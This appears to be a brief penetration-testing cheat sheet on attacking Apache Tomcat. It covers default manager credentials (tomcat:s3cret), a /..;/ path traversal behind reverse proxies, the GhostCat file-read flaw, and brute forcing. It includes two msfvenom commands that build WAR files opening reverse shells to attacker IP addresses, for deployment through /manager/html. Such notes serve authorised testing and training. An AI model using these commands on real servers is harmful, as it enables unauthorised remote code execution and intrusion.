Apache Tomcat

Introduction

Tomcat Manager Application is a Java-Based HTTP Web Server, that uses Web Application Archive (WAR) files. These files contain Java Servlets and JavaServer Pages(JSP) which add functionality to the application.

If an attacker gains attackers gains access to the Tomcat Manager Application due to default credentials tomcat:s3cret or weak credentials, the attacker could gain RCE by uploading a malicious WAR file.

Reverse shell

You can use Msfvenom to create your own .war file that contains a reverse shell.

# Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
# Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war

Then, accessing /manager/html you can deploy the WAR file, which once accessed you will obtain a reverse shell.

Upload via curl

If the tomcat server is misconfigured or you have access to the tomcat service with localhost, you could deploy/undeploy a reverse shell without accessing the web interface.

Tomcat path traversal

When Apache Tomcat is used together with a reverse proxy, Tomcat will treat the sequence /..;/ as /../ allowing the attacker to access Tomcat resources that are not normally accessible via the reverse proxy mapping.

GhosCat (CVE-2020-1938)

CVE-2020-1938 allows an unauthenticated attacker to read web application files from a vulnerable server through port 8009.

Brute forcing

Use it as your last resource because you might block the account.

References

• Tomcat

• Multiple Ways to Exploit Tomcat Manager

• Tomcat path traversal via reverse proxy mapping

• Breaking Parser Logic!